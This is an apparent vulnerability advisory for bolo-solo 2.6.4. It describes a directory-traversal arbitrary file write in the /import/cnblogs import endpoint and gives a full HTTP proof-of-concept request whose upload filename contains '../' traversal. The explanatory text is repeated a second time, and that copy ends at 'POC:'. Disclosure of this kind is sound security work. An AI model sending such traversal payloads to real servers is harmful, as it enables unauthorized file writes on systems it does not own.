In bolo-solo version 2.6.4, an arbitrary file write vulnerability exists in the path /import/cnblogs due to the lack of security validation on filenames.
Vulnerability file: src/main/java/org/b3log/solo/bolo/prop/BackupService.java
During import via the importFromCnblogs() method, the file is temporarily written using its original filename directly, without performing any security validation on the filename, leading to a directory traversal vulnerability combined with arbitrary file upload and arbitrary file write vulnerabilities.
Although the temporarily written file is intended to be deleted, since it has already been uploaded to a directory other than temp/file, the deletion method cannot locate the corresponding file. As a result, the written temporary file is not removed, leading to the vulnerability.
The final result is a successful directory traversal and file upload:
POC:
POST /import/cnblogs HTTP/1.1
Host: localhost:8080
Content-Length: 219
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWqUiXMVBVHBW0k6y
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin-index.do
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryWqUiXMVBVHBW0k6y
Content-Disposition: form-data; name="file"; filename="/../../../1.txt"
Content-Type: application/x-zip-compressed
123123
------WebKitFormBoundaryWqUiXMVBVHBW0k6y--
In bolo-solo version 2.6.4, an arbitrary file write vulnerability exists in the path /import/cnblogs due to the lack of security validation on filenames.
Vulnerability file: src/main/java/org/b3log/solo/bolo/prop/BackupService.java
During import via the importFromCnblogs() method, the file is temporarily written using its original filename directly, without performing any security validation on the filename, leading to a directory traversal vulnerability combined with arbitrary file upload and arbitrary file write vulnerabilities.
Although the temporarily written file is intended to be deleted, since it has already been uploaded to a directory other than temp/file, the deletion method cannot locate the corresponding file. As a result, the written temporary file is not removed, leading to the vulnerability.
The final result is a successful directory traversal and file upload:
POC: